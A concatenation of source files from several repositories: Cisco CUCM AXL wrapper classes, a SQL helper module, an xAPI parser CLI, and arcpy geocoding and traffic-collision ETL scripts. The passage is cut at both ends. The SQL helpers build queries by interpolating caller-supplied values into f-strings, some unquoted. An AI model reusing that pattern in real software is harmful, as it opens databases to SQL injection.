supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "apply", "restart"]
def add(self, name, basePhoneTemplateName, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class PhoneSecurityProfile(DeviceAXLAPI):
_factory_descriptor = "phone_security_profile"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "apply", "restart"]
def add(self, name, phoneType="Universal Device Template", protocol="Protocol Not Specified",
deviceSecurityMode=None, authenticationMode="By Null String", keySize=1024, transportType="TCP+UDP",
sipPhonePort=5060, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class RecordingProfile(SimpleAXLAPI):
_factory_descriptor = "recording_profile"
def add(self, name, recorderDestination, recordingCssName=None, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class RemoteDestination(SimpleAXLAPI):
_factory_descriptor = "remote_destination"
def add(self, destination, ownerUserId, name=None, enableUnifiedMobility=True, enableMobileConnect=True,
isMobilePhone=True, remoteDestinationProfileName=None, dualModeDeviceName=None, lineAssociations=None,
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class RemoteDestinationProfile(SimpleAXLAPI):
_factory_descriptor = "rdp"
def add(self, name, devicePoolName, userId, rerouteCallingSearchSpaceName=None, callingSearchSpaceName=None,
lines=None, product="Remote Destination Profile", protocol="Remote Destination", protocolSide="User",
**kwargs):
if "class" not in kwargs: # workaround for restricted 'class' attribute
kwargs["class"] = "Remote Destination Profile"
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class SdpTransparencyProfile(SimpleAXLAPI):
_factory_descriptor = "sdp_transparency_profile"
def add(self, name, attributeSet, **kwargs):
if "class" not in kwargs:
kwargs["class"] = "Trunk"
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class SipTrunk(DeviceAXLAPI):
_factory_descriptor = "sip_trunk"
def add(self, name, devicePoolName, destinations, product="SIP Trunk", locationName="Hub_None", protocol="SIP",
securityProfileName="Non Secure SIP Trunk Profile", sipProfileName="Standard SIP Profile",
presenceGroupName="Standard Presence Group", protocolSide="Network", **kwargs):
if "class" not in kwargs:
kwargs["class"] = "Trunk"
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class SipProfile(DeviceAXLAPI):
_factory_descriptor = "sip_profile"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "options", "apply", "restart"]
def add(self, name, sdpTransparency="Pass all unknown SDP attributes", **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class SipTrunkSecurityProfile(DeviceAXLAPI):
_factory_descriptor = "sip_trunk_security_profile"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "apply", "reset"]
def add(self, name, acceptPresenceSubscription=False, acceptOutOfDialogRefer=False,
acceptUnsolicitedNotification=False, allowReplaceHeader=False, transmitSecurityStatus=False, **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class SoftKeyTemplate(DeviceAXLAPI):
_factory_descriptor = "softkey_template"
supported_methods = ["model", "create", "add", "get", "update", "list", "remove", "apply", "restart"]
def add(self, name, description,
baseSoftkeyTemplateName="Standard User",
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class SoftKeySet(SimpleAXLAPI):
_factory_descriptor = "softkey_set"
supported_methods = ["get", "update"]
class UniversalDeviceTemplate(SimpleAXLAPI):
_factory_descriptor = "udt"
def add(self, name, devicePool, directoryNumber=None, lineLabel=None, displayCallerId=None, callingSearchSpace=None,
sipProfile="Standard SIP Profile", commonPhoneProfile="Standard Common Phone Profile",
phoneButtonTemplate="Universal Device Template Button Layout",
deviceSecurityProfile="Universal Device Template - Model-independent Security Profile",
blfPresenceGroup="Standard Presence group", location="Hub_None", **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class UniversalLineTemplate(SimpleAXLAPI):
_factory_descriptor = "ult"
def add(self, name, routePartition=None, lineDescription=None, callingSearchSpace=None, voiceMailProfile=None,
alertingName=None, rejectAnonymousCall=False, # override inconsistency between normal line add and ULT
blfPresenceGroup="Standard Presence group", **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class WifiHotspot(SimpleAXLAPI):
_factory_descriptor = "wifi_hotspot"
def add(self, name, ssidPrefix, frequencyBand="Auto", userModifiable="Allowed", authenticationMethod="None",
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class WLANProfile(SimpleAXLAPI):
_factory_descriptor = "wlan_profile"
def add(self, name, ssid, frequencyBand="Auto", userModifiable="Allowed", authMethod="EAP-FAST",
networkAccessProfile=None, userName="", password="", **kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
class WlanProfileGroup(SimpleAXLAPI):
_factory_descriptor = "wlan_profile_group"
def add(self, name,
members=None,
**kwargs):
add_kwargs = flatten_signature_kwargs(self.add, locals())
return super().add(**add_kwargs)
```
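For orientation, the sketch below shows how these endpoint classes are typically reached. It assumes an authenticated `UCMAXLConnector` (the connector type referenced in `sql_utils.py` below) exposes each endpoint under its `_factory_descriptor` name, e.g. `axl.line` and `axl.phone`; the connection arguments and device values are purely illustrative.
```python
from ciscocucmapi import UCMAXLConnector

# Hypothetical credentials -- replace with a real CUCM publisher and AXL user.
axl = UCMAXLConnector(username="axluser", password="secret", fqdn="ucm.example.com")

# Add a directory number, then a phone in the default device pool.
axl.line.add(pattern="1001", routePartitionName="Internal_PT")
axl.phone.add(name="SEP001122334455", product="Cisco 8841", devicePoolName="Default")
```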
#### File: src/ciscocucmapi/sql_utils.py
```python
from .helpers import extract_pkid_from_uuid
def get_device_pkid(axl_connector, device_name):
"""Get a device pkid from the device name"""
sql_statement = f"select pkid from device where name={device_name}"
return axl_connector.sql.query(sql_statement)
def get_enduser_pkid(axl_connector, userid):
"""Get an enduser pkid from the enduser userid"""
sql_statement = f"select pkid from enduser where userid={userid}"
return axl_connector.sql.query(sql_statement)
def associate_device_to_enduser(axl_connector, enduser_pkid_or_uuid, device_pkid_or_uuid, tkuserassociation=1):
"""Insert row into enduserdevicemap table to add user/device association"""
enduser_pkid = extract_pkid_from_uuid(enduser_pkid_or_uuid)
device_pkid = extract_pkid_from_uuid(device_pkid_or_uuid)
sql_statement = f"insert into enduserdevicemap (fkenduser, fkdevice, defaultprofile, tkuserassociation)" \
f"values ('{enduser_pkid}','{device_pkid}','f','{tkuserassociation}')"
return axl_connector.sql.update(sql_statement)
def associate_enduser_to_user_group(axl_connector, enduser_pkid_or_uuid, dirgroup_pkid_or_uuid):
"""Insert row into enduserdirgroupmap table to add enduser/user group association"""
enduser_pkid = extract_pkid_from_uuid(enduser_pkid_or_uuid)
dirgroup_pkid = extract_pkid_from_uuid(dirgroup_pkid_or_uuid)
sql_statement = f"insert into enduserdirgroupmap (fkenduser, fkdirgroup) " \
f"values ('{enduser_pkid}', '{dirgroup_pkid}')"
return axl_connector.sql.update(sql_statement)
def get_dn_pkid(axl_connector, dnorpattern, tkpatternusage=2):
"""Get dn pkid from the dnorpattern from numplan table.
Note:
Does not ensure uniqueness as does not include join on route partition table
:param axl_connector: (UCMAXLConnector) axl connector
:param (str) dnorpattern: pattern or DN
:param (int) tkpatternusage: defaults to 2 for DNs
:return: (str) pkid
"""
sql_statement = f"select pkid from numplan " \
f"where dnorpattern={dnorpattern} "\
f"and tkpatternusage={tkpatternusage}"
return axl_connector.sql.query(sql_statement)
def get_service_parameter_details(axl_connector, parameter_name):
"""Get individual service parameters tuple"""
sql_statement = f"select * from processconfig " \
f"where paramname = '{parameter_name}'"
return axl_connector.sql.query(sql_statement)
def update_service_parameter(axl_connector, parameter_name, parameter_value):
"""Update service parameter with specified value"""
sql_statement = f"update processconfig " \
f"set paramvalue = '{parameter_value}' " \
f"where paramname = '{parameter_name}'"
return axl_connector.sql.update(sql_statement)
def ldap_sync(axl_connector, name=None, uuid=None):
"""SQL-based LDAP sync fallback method for AXL versions not supporting doLdapSync"""
try:
return axl_connector.sql.update(
sql_statement=f"update directorypluginconfig set syncnow = '1' where name = '{name}'"
)
except TypeError:
name = extract_pkid_from_uuid(
axl_connector.ldap_directory.get(uuid=uuid, returnedTags={"name": ""})
)
return ldap_sync(axl_connector, name=name)
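# --- Illustrative usage (not part of the original module) ---
# Assumes an initialised UCMAXLConnector, as the docstrings above describe;
# the device name and userid below are hypothetical.
#
# device_pkid = get_device_pkid(axl, "SEP001122334455")
# enduser_pkid = get_enduser_pkid(axl, "jdoe")
# associate_device_to_enduser(axl, enduser_pkid, device_pkid)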
``` |
{
"source": "jonathanelscpt/xapiparser",
"score": 2
} |
#### File: src/xapiparser/cli.py
```python
import argparse
import lxml.etree as etree
from xapiparser import __version__
from xapiparser import parse
parser = argparse.ArgumentParser(description='xAPI ssh command parser.')
parser.add_argument('command', metavar='cmd', nargs=1,
help="xAPI ssh command")
parser.add_argument('--version', action='version',
version='%(prog)s v{version}'.format(version=__version__))
def main(args=None):
args = parser.parse_args(args=args)
print(etree.tostring(parse(args.command[0]), pretty_print=True, encoding='unicode'))
```
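As a quick usage note, the `main()` entry point accepts an argv-style list, so it can be exercised directly; the xAPI command string below is illustrative, and the exact XML printed depends on `xapiparser.parse`.
```python
from xapiparser.cli import main

# Parses the ssh-style xAPI command and pretty-prints the resulting XML.
main(["xConfiguration Audio DefaultVolume: 50"])
```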
#### File: xapiparser/tests/conftest.py
```python
import lxml.etree as etree
import pytest
@pytest.fixture
def strip_whitespace():
return etree.XMLParser(remove_blank_text=True)
``` |
{
"source": "jonathanengelbert/automated_geocoding",
"score": 2
} |
#### File: automated_geocoding/production/geocoding_v2.py
```python
import arcpy
arcpy.env.overwriteOutput = True
arcpy.env.workspace = r"I:\GIS\OASIS\Geocoder\geocoder.gdb"
def geocode():
try:
# Local variables:
transformed_xlsx = "I:\\GIS\\OASIS\\Geocoder\\transformed.xlsx"
transfomed = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\transfomed"
AddressLocator_Master_Address_Database = "I:\\GIS\\OASIS\\AddressLocators\\AddressLocator_Master_Address_Database"
geocoded_addresses = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\geocoded_addresses"
geocoder_gdb = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb"
geocoded_addresses_failed = "geocoded_addresses_failed"
unmatched_xls = "I:\\GIS\\OASIS\\Geocoder\\unmatched.xls"
unmatched = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\unmatched"
unmatched__3_ = unmatched
AddressLocator_Street_Centerlines__2_ = "I:\\GIS\\OASIS\\AddressLocators\\AddressLocator_Street_Centerlines"
geocoded_street_centerlines = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\geocoded_street_centerlines"
geocoded_street_centerlines_successful = "geocoded_street_centerlines_successful"
geocoded_street_centerlines_successful__2_ = geocoded_street_centerlines_successful
geocoded_street_centerlines_successful__3_ = geocoded_street_centerlines_successful__2_
geocoder_gdb__2_ = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb"
geocoded_master_successful = "geocoded_master_successful"
geocoded_master_successful__2_ = geocoded_master_successful
geocoded_master_successful__4_ = geocoded_master_successful__2_
geocoder_eas = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\geocoder_eas"
final = "I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\final"
# Process: Excel To Table
try:
arcpy.ExcelToTable_conversion(transformed_xlsx, transfomed)
except Exception as e:
print(e)
# Process: Geocode Addresses
try:
arcpy.GeocodeAddresses_geocoding(transfomed,
AddressLocator_Master_Address_Database,
"Key transformed_address VISIBLE NONE",
geocoded_addresses, "STATIC", "", "")
except Exception as e:
print(e)
# Process: Make Feature Layer
try:
arcpy.MakeFeatureLayer_management(geocoded_addresses,
geocoded_addresses_failed,
"Status = 'U'", geocoder_gdb,
"ObjectID OBJECTID VISIBLE NONE;Shape Shape VISIBLE NONE;Status Status VISIBLE NONE;Score Score VISIBLE NONE;Match_type Match_type VISIBLE NONE;Match_addr Match_addr VISIBLE NONE;X X VISIBLE NONE;Y Y VISIBLE NONE;Xmin Xmin VISIBLE NONE;Xmax Xmax VISIBLE NONE;Ymin Ymin VISIBLE NONE;Ymax Ymax VISIBLE NONE;Addr_type Addr_type VISIBLE NONE;ARC_Single_Line_Input ARC_Single_Line_Input VISIBLE NONE")
except Exception as e:
print(e)
# Process: Table To Excel
try:
arcpy.TableToExcel_conversion(geocoded_addresses_failed, unmatched_xls,
"NAME", "CODE")
except Exception as e:
print(e)
# Process: Excel To Table (2)
arcpy.ExcelToTable_conversion(unmatched_xls, unmatched, "")
# Process: Delete Field
arcpy.DeleteField_management(unmatched,
"OBJECTID_1;Status;Score;Match_type;Match_addr;X;Y;Xmin;Xmax;Ymin;Ymax;Addr_type;ARC_Single_Line_Input;ARC_SingleKey")
# Process: Geocode Addresses (2)
arcpy.GeocodeAddresses_geocoding(unmatched__3_,
AddressLocator_Street_Centerlines__2_,
"'Full Address' transformed_address VISIBLE NONE",
geocoded_street_centerlines, "STATIC", "",
"")
# Process: Make Feature Layer (3)
arcpy.MakeFeatureLayer_management(geocoded_street_centerlines,
geocoded_street_centerlines_successful,
"", "",
"ObjectID ObjectID VISIBLE NONE;Shape Shape VISIBLE NONE;Status Status VISIBLE NONE;Score Score VISIBLE NONE;Match_type Match_type VISIBLE NONE;Match_addr Match_addr VISIBLE NONE;Side Side VISIBLE NONE;Ref_ID Ref_ID VISIBLE NONE;User_fld User_fld VISIBLE NONE;Addr_type Addr_type VISIBLE NONE;ARC_Single_Line_Input ARC_Single_Line_Input VISIBLE NONE")
# Process: Add Field (2)
arcpy.AddField_management(geocoded_street_centerlines_successful,
"geocoder", "TEXT", "", "", "", "", "NULLABLE",
"NON_REQUIRED", "")
# Process: Calculate Field (2)
arcpy.CalculateField_management(geocoded_street_centerlines_successful__2_,
"geocoder", "classifyGeocoder(!Status!)",
"PYTHON",
"def classifyGeocoder(Status):\\n if Status == \"M\" or Status == \"T\":\\n return \"SC\"\\n else:\\n return \"U\"")
# Process: Make Feature Layer (2)
arcpy.MakeFeatureLayer_management(geocoded_addresses,
geocoded_master_successful,
"Status = 'M' OR Status = 'T'",
geocoder_gdb__2_,
"ObjectID OBJECTID VISIBLE NONE;Shape Shape VISIBLE NONE;Status Status VISIBLE NONE;Score Score VISIBLE NONE;Match_type Match_type VISIBLE NONE;Match_addr Match_addr VISIBLE NONE;X X VISIBLE NONE;Y Y VISIBLE NONE;Xmin Xmin VISIBLE NONE;Xmax Xmax VISIBLE NONE;Ymin Ymin VISIBLE NONE;Ymax Ymax VISIBLE NONE;Addr_type Addr_type VISIBLE NONE;ARC_Single_Line_Input ARC_Single_Line_Input VISIBLE NONE")
# Process: Add Field
arcpy.AddField_management(geocoded_master_successful, "geocoder", "TEXT",
"", "", "20", "", "NULLABLE", "NON_REQUIRED", "")
# Process: Calculate Field
arcpy.CalculateField_management(geocoded_master_successful__2_, "geocoder",
"\"EAS\"", "PYTHON", "")
# Process: Copy Features
arcpy.CopyFeatures_management(geocoded_master_successful__4_, geocoder_eas,
"", "0", "0", "0")
# Process: Merge
print("SUCCEDED")
fieldmappings = arcpy.FieldMappings()
fieldmappings.addTable(transfomed)
arcpy.Merge_management(
"I:\\GIS\\OASIS\\Geocoder\\geocoder.gdb\\geocoder_eas; geocoded_street_centerlines_successful",
final, fieldmappings)
print("GEOCODING SUCCESSFUL")
except Exception as e:
print("ERROR")
print(e)
if __name__ == "__main__":
geocode()
print("\nAddresses Processed")
exit()
``` |
{
"source": "jonathanengelbert/ETLs",
"score": 2
} |
#### File: jonathanengelbert/ETLs/GreenConnectionsBSP_in_gdb.py
```python
#This script pulls Better Streets plan and Green Connections from the Planning SDE into TIM.
#Last modified: 11/21/2017 by <NAME>
#
### No Known Issues
################################################################################################
import arcpy
from arcpy import env
import sys, string, os, time, datetime
# SET TO OVERWRITE
arcpy.env.overwriteOutput = True
# Logging script
myStartDate = str(datetime.date.today())
myStartTime = time.clock()
theStartTime = time.ctime()
print theStartTime
try:
myStartDate = str(datetime.date.today())
myStartTime = time.clock()
theStartTime = time.ctime()
# thisfile = os.path.realpath(__file__)
file = open("C:/ETLs/TIM/TIMUpdates/logs/" + myStartDate + "BSP_GreenConnections" + ".txt", "w")
file.write(theStartTime + "\n")
when =datetime.date.today()
theDate = when.strftime("%d")
theDay=when.strftime("%A")
print theDay
################################################################################################
# STEP ONE
# COPYING FROM SDE TO LOCAL STAGING FOLDER: SET NAMES AND PATHS AND COPY
# filepath for all copied files:
staging_gdb = "\\\\CP-GIS-SVR1\\arcgisserver\\DataAndMXDs\\TIMReady\\GreenConnections.gdb\\"
# better streets plan
try:
bsp_sde = "Database Connections\\CITYPLAN-03SDE.sde\\GISDATA.BetterStreetsPlan"
bsp_local_1 = "bsp_1"
arcpy.CopyFeatures_management(bsp_sde, staging_gdb + bsp_local_1)
print "BSP copied from SDE to staging folder"
file.write(str(time.ctime()) +": copied files - BSP"+ "\n")
except:
file.write(str(time.ctime()) +": FAILED TO COPY - BSP"+ "\n")
# green connections
gc_sde = "Database Connections\\CITYPLAN-03SDE.sde\\GISDATA.GreenConnectionsNetwork"
print "Green Connections loaded from " + gc_sde
gc_layername = "gc_layer" # make into layer to get selection
arcpy.MakeFeatureLayer_management (gc_sde, gc_layername,""" "GC_RT_NME5" <> ' ' """, "", "")
gc_local_1 = "gc_1"
arcpy.CopyFeatures_management(gc_layername, staging_gdb + gc_local_1)
file.write(str(time.ctime()) +": copied green connections"+ "\n")
print "Saved to " + gc_local_1
################################################################################################
# STEP TWO
# GEOPROCESSING
# Project both layers
print "Reprojecting BSP"
bsp_local_2 = "bsp_2"
webmercator = arcpy.SpatialReference(3857) # This is WGS_1984_Web_Mercator_Auxiliary_Sphere WKID: 3857 Authority: EPSG
arcpy.Project_management(staging_gdb + bsp_local_1, staging_gdb + bsp_local_2, webmercator)
print "BSP reprojected to " + bsp_local_2
file.write(str(time.ctime()) +": projected1"+ "\n")
print "Reprojecting GC"
gc_local_2 = "gc_2"
webmercator = arcpy.SpatialReference(3857)
arcpy.Project_management(staging_gdb + gc_local_1, staging_gdb + gc_local_2, webmercator)
print "GC reprojected to " + gc_local_2
file.write(str(time.ctime()) +": projected2"+ "\n")
# process BSP data
# load table of sidewalk widths
BSP_sidewalks = "\\\\CP-GIS-SVR1\\arcgisserver\\DataAndMXDs\\TIMReady\\BSP_sidewalks_OID.dbf"
print "BSP table loaded"
# add field for final street type
arcpy.AddField_management(staging_gdb + bsp_local_2, "finaltype", "TEXT", "", "", "", "", "NULLABLE", "NON_REQUIRED", "")
print "BSP fields added"
file.write(str(time.ctime()) +": BSP fields added"+ "\n")
# Process: Calculate Field
arcpy.CalculateField_management(staging_gdb + bsp_local_2, "finaltype", "bsp( !BSP_Class!, !Special!)", "PYTHON", "def bsp(BSP_Class,Special):\\n if Special != 'N':\\n return Special\\n else:\\n return BSP_Class")
print "BSP fields calculated"
file.write(str(time.ctime()) +": BSP field calc"+ "\n")
# Dissolve BSP (dissolve before join to make join faster)
bsp_local_3 = "BetterStreetsPlan_TIM"
arcpy.Dissolve_management(staging_gdb + bsp_local_2, staging_gdb + bsp_local_3, ["STREETNAME","BSP_Class","Special","finaltype"], "", "", "")
print "BSP dissolved"
print "BSP joining fields..."
file.write(str(time.ctime()) +": dissolved"+ "\n")
# Join fields from sidewalk table
arcpy.JoinField_management(staging_gdb + bsp_local_3, "finaltype", BSP_sidewalks, "finaltype", "side_min;side_rec")
print "BSP fields joined"
file.write(str(time.ctime()) +": joined"+ "\n")
# process Green Connections
# Dissolve Green Connections
gc_local_3 = "GreenConnectionsTIM_dissolve"
arcpy.Dissolve_management(staging_gdb + gc_local_2, staging_gdb + gc_local_3, ["STREETNAME","GC_RT_NME5","GC_RT_NUM5"], "", "", "")
print "GC dissolved"
file.write(str(time.ctime()) +": dissolved 2"+ "\n")
# function to create buffers
def arcpybuffer(buffer_name,original_name,buffer_dist,dissolve_opt,dissolve_fld):
print("\n")
print "Buffering " + buffer_name
# bufferlist.append(buffer_name)
staging_name = staging_gdb + original_name
filename_buffer = staging_gdb + buffer_name
arcpy.Buffer_analysis(staging_name, filename_buffer, buffer_dist, "", "", dissolve_opt, dissolve_fld)
# Buffer BSP
arcpybuffer("betterstreetsbuffer",bsp_local_3,"250 Feet","","")
file.write(str(time.ctime()) +": buffered 1"+ "\n")
# Buffer GC
arcpybuffer("greenconnectionsbuffer",gc_local_3,"250 Feet","","")
file.write(str(time.ctime()) +": buffered2"+ "\n")
print("FINISHED SUCCESSFULLY")
file.write(str(time.ctime()) +": FINISHED SUCCESSFULLY"+ "\n")
file.close()
################################################################################################
except Exception,e:
print str(e)
print "Ended badly"
file.write(str(time.ctime()) +": Ended badly")
file.write(str(e))
file.close()
print arcpy.GetMessages()
print arcpy.GetMessages(2)
print arcpy.GetMessages(1)
myEndTime = time.clock()
theTime = myEndTime - myStartTime
theEndTime = time.ctime()
theMinutes = theTime / 60
print arcpy.GetMessages(2)
print arcpy.GetMessages(1)
myEndTime = time.clock()
theTime = myEndTime - myStartTime
theEndTime = time.ctime()
theMinutes = theTime / 60
```
#### File: jonathanengelbert/ETLs/transbase_2v2.py
```python
import arcpy
from arcpy import env
import sys, string, os, time, datetime
# SET TO OVERWRITE
arcpy.env.overwriteOutput = True
# Logging script
myStartDate = str(datetime.date.today())
myStartTime = time.clock()
theStartTime = time.ctime()
print theStartTime
try:
myStartDate = str(datetime.date.today())
myStartTime = time.clock()
theStartTime = time.ctime()
# thisfile = os.path.realpath(__file__)
file = open("C:/ETLs/TIM/TIMUpdates/Logs/" + myStartDate + "Transbase2" + ".txt", "w")
file.write(theStartTime + "\n")
when =datetime.date.today()
theDate = when.strftime("%d")
theDay=when.strftime("%A")
print theDay
################################################################################################
#STEP ONE
# COPYING FROM SDE TO LOCAL STAGING FOLDER
# NOTE: NO NEED TO REPROJECT TRANSBASE LAYERS
# filepath for all copied files:
staging_gdb = "\\\\CP-GIS-SVR1\\arcgisserver\\DataAndMXDs\\TIMReady\\Transbase_2.gdb\\"
# pedestrian collisions
#HAS THIS CHANGED NAME?
tb_ped = "Database Connections\\Transbase.sde\\transbase_public.public.vw_geo_switrs_all_types_ped_col_cty"
pedcol_1 = "pedcol_1"
try:
pedcolloc="\\\\CP-GIS-SVR1\\arcgisserver\\DataAndMXDs\\TIMReady\\Transbase_2.gdb\\pedcol_1"
#arcpy.CopyFeatures_management(tb_ped, staging_gdb + pedcol_1, "", "0", "0", "0")
arcpy.CopyFeatures_management(tb_ped, pedcolloc, "", "0", "0", "0")
print "Pedestrian collisions from Transbase loaded"
print "Copied successfully to staging folder"
file.write(str(time.ctime()) +": copied files - ped"+ "\n")
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO COPY - ped"+ "\n")
print "FAILED TO COPY - ped"
# bike collisions
tb_bikecol = "Database Connections\\Transbase.sde\\transbase_public.public.vw_geo_switrs_all_types_cyc_col_cty"
bikecol_1 = "bikecol_1"
try:
arcpy.CopyFeatures_management(tb_bikecol, staging_gdb + bikecol_1, "", "0", "0", "0")
arcpy.MultipartToSinglepart_management(staging_gdb + bikecol_1, staging_gdb + "bikecol_1_singlepart")
print "Bicycle collisions from Transbase loaded"
print "Copied successfully to staging folder"
file.write(str(time.ctime()) +": copied files - bike"+ "\n")
except:
file.write(str(time.ctime()) +": FAILED TO COPY - bike"+ "\n")
print "FAILED TO COPY - bike"
bikecol_1 = "bikecol_1_singlepart"
# pedestrian collisions (all parties)
tb_ped_party = "Database Connections\\Transbase.sde\\transbase_public.public.vw_geo_intrsctn_switrs_all_types_ped_col_prties_all_cty"
tb_ped_party = "Database Connections\\Transbase.sde\\transbase_public.public.vw_geo_switrs_all_types_ped_col_prties_all_cty"
pedcol_party = "pedcol_party"
try:
arcpy.CopyFeatures_management(tb_ped_party, staging_gdb + pedcol_party, "", "0", "0", "0")
print "Pedestrian collisions (all parties) from Transbase loaded"
print "Copied successfully to staging folder"
file.write(str(time.ctime()) +": copied files - pedcol party"+ "\n")
except:
file.write(str(time.ctime()) +": FAILED TO COPY - pedcol party"+ "\n")
print "FAILED TO COPY - pedcol party"
# bike collisions (all parties)
#tb_bike_party = "Database Connections\\Transbase.sde\\transbase_public.public.vw_geo_intrsctn_switrs_all_types_cyc_col_prties_all_cty"
tb_bike_party = "Database Connections\\Transbase.sde\\transbase_public.public.vw_geo_switrs_all_types_cyc_col_prties_all_cty"
bikecol_party = "bikecol_party"
try:
arcpy.CopyFeatures_management(tb_bike_party, staging_gdb + bikecol_party, "", "0", "0", "0")
print "Bicycle collisions (all parties) from Transbase loaded"
print "Copied successfully to staging folder"
file.write(str(time.ctime()) +": copied files - bikecol party"+ "\n")
except:
file.write(str(time.ctime()) +": FAILED TO COPY - bikecol party"+ "\n")
print "FAILED TO COPY - bikecol party"
################################################################################################
#STEP TWO
# GEOPROCESSING: PED AND BIKE INJURY/FATALITY COUNT AT INTERSECTION
# Ped counts at intersection
pedcol_2 = "TB_pedcollisions_int"
try:
print "Calculating ped counts..."
arcpy.AddField_management(staging_gdb + pedcol_1, "pedinj", "SHORT", "", "", "", "", "NULLABLE", "NON_REQUIRED", "")
arcpy.AddField_management(staging_gdb + pedcol_1, "pedfatal", "SHORT", "", "", "", "", "NULLABLE", "NON_REQUIRED", "")
arcpy.CalculateField_management(staging_gdb + pedcol_1, "pedinj", "!count_ped_injured!", "PYTHON", "")
arcpy.CalculateField_management(staging_gdb + pedcol_1, "pedfatal", "!count_ped_injured!", "PYTHON", "")
print "Success"
file.write(str(time.ctime()) +": calculated ped counts"+ "\n")
print "Dissolving ped counts..."
arcpy.Dissolve_management(
staging_gdb + pedcol_1,
staging_gdb + pedcol_2,
"cnn_intrsctn_fkey",
"primary_rd FIRST;secondary_rd FIRST;intersection FIRST;pedinj SUM;pedfatal SUM", "MULTI_PART", "DISSOLVE_LINES"
)
print "Success"
except Exception as e:
print(e)
print "Success"
file.write(str(time.ctime()) +": dissolved"+ "\n")
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS ped counts"+ "\n")
# Bike counts at intersection
try:
print "Calculating bike counts..."
arcpy.AddField_management(staging_gdb + bikecol_1, "bikeinj", "SHORT", "", "", "", "", "NULLABLE", "NON_REQUIRED", "")
arcpy.AddField_management(staging_gdb + bikecol_1, "bikefatal", "SHORT", "", "", "", "", "NULLABLE", "NON_REQUIRED", "")
arcpy.CalculateField_management(staging_gdb + bikecol_1, "bikeinj", "!count_bicyclist_injured!", "PYTHON", "")
arcpy.CalculateField_management(staging_gdb + bikecol_1, "bikefatal", "!count_bicyclist_killed!", "PYTHON", "")
print "Success"
file.write(str(time.ctime()) +": calculated bike counts"+ "\n")
print "Dissolving bike counts..."
bikecol_2 = "TB_bikecollisions_int"
arcpy.Dissolve_management(
staging_gdb + bikecol_1,
staging_gdb + bikecol_2,
"cnn_intrsctn_fkey",
"primary_rd FIRST;secondary_rd FIRST;intersection FIRST;bikeinj SUM;bikefatal SUM", "MULTI_PART", "DISSOLVE_LINES"
)
print "Success"
file.write(str(time.ctime()) +": dissolved bikes"+ "\n")
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS bike counts"+ "\n")
################################################################################################
#STEP THREE
# GEOPROCESSING: PED AND BIKE FATALITIES
# PED
# Ped fatalities
try:
switrs_mvmt_csv = "C:\\ETLs\\TIM\\TIMUpdates\\Helper Files\\switrs_mvmt.csv"
switrs_mvmt_codes = "C:\\ETLs\\TIM\\TIMUpdates\\Helper Files\\switrs_mvmt.dbf"
arcpy.CopyRows_management (switrs_mvmt_csv, switrs_mvmt_codes)
print "SWITRS codes loaded"
except:
file.write(str(time.ctime()) +": FAILED TO PROCESS ped fatalities - SWITRS codes loading failed"+ "\n")
print "SWITRS codes not loaded"
try:
print "Filtering for ped fatalities..."
# Create shapefile: pedestrian level, fatalities only
ped_f = "pedcollisions_party_ped_fatal"
arcpy.FeatureClassToFeatureClass_conversion (staging_gdb + pedcol_party, staging_gdb, ped_f, """ "party_type" = 'Pedestrian' AND "party_number_killed" <> 0 """)
file.write(str(time.ctime()) +": copied FC - ped fatal"+ "\n")
print("Success")
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS ped fatalities - feature class to feature class conversion (ped level fatalities)"+ "\n")
print "error - feature class to feature class conversion (ped level fatalities)"
try:
# Create shapefile: auto level, with only columns for join (collision ID and turning movement of car)
ped_f_auto = "ped_f_auto"
arcpy.FeatureClassToFeatureClass_conversion (staging_gdb + pedcol_party, staging_gdb, ped_f_auto, """ "party_type" = 'Driver (including Hit and Run)' """)
print "Success"
file.write(str(time.ctime()) +": copied FC - ped f auto"+ "\n")
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS ped fatalities - feature class to feature class conversion (auto level dataset)"+ "\n")
print "error - feature class to feature class conversion (auto level)"
# Join auto movement to ped fatality table
try:
print "Processing ped fatalities..."
# rename first to avoid confusion
arcpy.AddField_management(staging_gdb + ped_f_auto, "auto_move", "TEXT", "", "", "100", "", "NULLABLE", "NON_REQUIRED", "")
arcpy.CalculateField_management(staging_gdb + ped_f_auto, "auto_move", "!move_pre_acc!", "PYTHON_9.3", "")
arcpy.DeleteField_management(staging_gdb + ped_f_auto, "move_pre_acc")
